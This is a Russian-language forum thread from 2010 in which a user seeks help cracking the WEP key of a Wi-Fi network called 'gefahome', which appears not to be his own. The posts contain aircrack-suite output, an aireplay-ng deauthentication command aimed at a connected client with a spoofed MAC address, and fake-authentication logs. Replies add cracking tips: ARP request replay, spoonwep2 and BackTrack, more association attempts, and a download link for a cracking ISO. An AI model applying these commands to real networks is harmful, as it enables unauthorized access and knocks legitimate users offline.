Траблы со взломом WEP.

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by mr.The, 20 Jun 2010.

  1. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    Есть точка, запускаю сбор пакетов:

    Code:
                                                                                                                                                                       
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                           
     72:E8:5A:5A:AB:5B   -1   0     8979     2701    0  11  54   WEP  WEP         gefahome                                                                                 
                                                                                                                                                                           
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                             
                                                                                                                                                                           
     72:E8:5A:5A:AB:5B  00:1B:11:1F:A5:60  -67    0 - 2   1844     5884  gefahome                                                                                           
     72:E8:5A:5A:AB:5B  00:0C:F1:1B:13:07  -75    0 - 1     18     6611   
    
    data тут есть тк пявился клиент. Но обычно его нет. Дальше я подменяю мак на 00:0C:F1:1B:13:07 и делаю деаутентификацию:

    Code:
    mrthe@mrthe-laptop:~$ sudo aireplay-ng -0 0 -e gefahome -a 72:E8:5A:5A:AB:5B -c 00:0C:F1:1B:13:07 mon0
    20:44:53  Waiting for beacon frame (BSSID: 72:E8:5A:5A:AB:5B) on channel 11
    20:45:03  No such BSSID available.
    mrthe@mrthe-laptop:~$ sudo aireplay-ng -0 0 -e gefahome -a 00:1B:11:1F:A5:60 -c 00:0C:F1:1B:13:07 mon0
    20:45:18  Waiting for beacon frame (BSSID: 00:1B:11:1F:A5:60) on channel 11
    20:45:19  Sending 64 directed DeAuth. STMAC: [00:0C:F1:1B:13:07] [181| 3 ACKs]
    20:45:19  Sending 64 directed DeAuth. STMAC: [00:0C:F1:1B:13:07] [182|10 ACKs]
    Но тут видно ещё одну проблему, точка не отвечает по BSSID. Второй мак, казалось бы, мак клиента, но он резолвится когда обращаюсь к точке по имени.

    Дале пытаюсь аутентифицироваться:
    Code:
    20:41:40  Sending Authentication Request (Open System) [ACK]
    20:41:40  Authentication successful
    20:41:40  Sending Association Request
    20:41:40  Got a deauthentication packet! (Waiting 3 seconds) [B](это мой пакет деаутентификации, это ок)[/B]
    
    20:41:46  Sending Authentication Request (Open System) [ACK]
    20:41:46  Authentication successful
    20:41:46  Sending Association Request [ACK]
    
    20:41:49  Sending Authentication Request (Open System)
    20:41:50  Authentication successful
    20:41:50  Sending Association Request [ACK]
    
    и последние 3 строки так повторяются до бесконечности.. В этом вся и проблема, аутентифицироваться не получается, а без этого генерация пакетов просто не работает.

    В чём проблема, и что я делаю не так?
     
    2 people like this.
  2. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    568
    Likes Received:
    86
    Reputations:
    11
    1. ты сколько попыток аутентификации ставишь?
    2. попробуй spoonwep2 есть где-то в инете, если ты под backtrack ломаешь, то самое то будет, если не найдешь попробую завтра скинуть тебе.
     
  3. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    0(т.е. до беспонечности). Разве что-то изменится если сократить кол-во? На других точках производил те же действия и всё ок было, с 1-го пакета аутентифицировался.

    а spoonwep2 попробую. Да и у меня ubuntu.
     
  4. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    568
    Likes Received:
    86
    Reputations:
    11

    ну у тебя же пишет что 20:41:46 Authentication successful

    зачем еще ее раз проводить? если ты завязался с точкой.
    думаю есть смысл поставить 3 а дальше уже ARP request replay
     
  5. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    когда всё ок пишет примерно так
    Code:
    19:30:28 Sending Authentication Request (Open System) [ACK]
    19:30:28 Authentication successful
    19:30:28 Sending Association Request [ACK]
    19:30:28 Association successful :-) (AID: 1)
    а у меня до ассоциации не доходит. ARP request replay без этого не работает. Точнее работает, но пакеты не генерирует..


    Да, а spoonwep2 и немогу поставить, там lzm файл, и я как только не пытался его запустить и открыть.. lzm2dir нету в убунте =\
     
    #5 mr.The, 20 Jun 2010
    Last edited: 20 Jun 2010
  6. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    568
    Likes Received:
    86
    Reputations:
    11
    у меня кстати было тоже на одной из точек что аутентификация прошла но нет ассоциации, я просто забил ))
    а спунвэп у меня под БэкТрэком запускается. его достаточно в каталог со всеми остальными утилитами закинуть и вперед.
     
    1 person likes this.
  7. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    забить не интересно) к слову, я собрал ~8k пакетов, пока клиент был. Пас конечно не сбрутился, но мб можно часть паса узнать, или так нельзя?..

    а бектрек с лайвсд не видит мою карту, а на виртуалку ставить криво, имхо.
     
  8. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    568
    Likes Received:
    86
    Reputations:
    11
    а я для этого дела юзаю 3 версию, она у меня прямо с флешки грузится.
    Я конечно не гуру, но думаю что 8к пакетов не всегда может хватить, и часть паса имхо нельзя никак увидеть , только целиком.

    смотря какой еще вэп ключ, там же вроде есть 64 и 128 бит.

    что у тебя за карточка?
     
  9. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    broadcom. нормальный драйвер(с которым можно вардрайвить) появился только с 2.6.32-го ядра.
     
    2 people like this.
  10. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    568
    Likes Received:
    86
    Reputations:
    11
    всеж попробуй backtrack3 + spoonwep2
    сама ось тут

    и сделай ее на флэшке
    тыц
     
  11. Valer

    Valer New Member

    Joined:
    10 Feb 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    CDLINUX.iso + spoonwep2 http://depositfiles.com/ru/files/rbxyd6n06

    покупал в комплекте с Gsky-link GS-27USB-5, работает отлично...
     
  12. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    то же на днях Gsky-link GS-27USB-5 на почту придет, а по делу
    bactrack 4 или 3 + spoonwep, дабы автоматизировать процесс
     
  13. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    568
    Likes Received:
    86
    Reputations:
    11
    spoonwep не всегда корректно отрабатывает
     
  14. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    Valer, спасибо, но качать 100 мб с депозита я не буду, да и дистр непонятный... проще уже свою карту в бт настроить.
     
    1 person likes this.
  15. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    я если spoonwep не отрабатывает беру aircrack-ng, aireplay-ng, airodump-ng
     
  16. Stopko_0

    Stopko_0 Member

    Joined:
    17 Feb 2010
    Messages:
    63
    Likes Received:
    13
    Reputations:
    0
    можно попробовать бактрак обновить ручками (ядро собрать новое, на котором есть поддержка карты)
    по сабжу: у меня такое было, насколько я понял - это либо точка слишком далеко, сигнал слабый (в манах на оффсайте айркрака это одна из причин безуспешных попыток ассоциации), либо что то не то с привязкой по маку. в моем случае все решилось увеличением числа попыток ассоцииации, раза с 30 вроде получилось
     
  17. mr.The

    mr.The Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    1,079
    Likes Received:
    456
    Reputations:
    38
    Stopko_0, собирать бектрак круто, но долго и особо нет смысла. хотя, мб попробую.
    сигнал, вроде, хороший. нерворк-манагер даёт половину полосок.
    с привязкой по маку как только не крутил.
    кол-во ассоциаций ставил и 100, результат тот же..
     
Loading...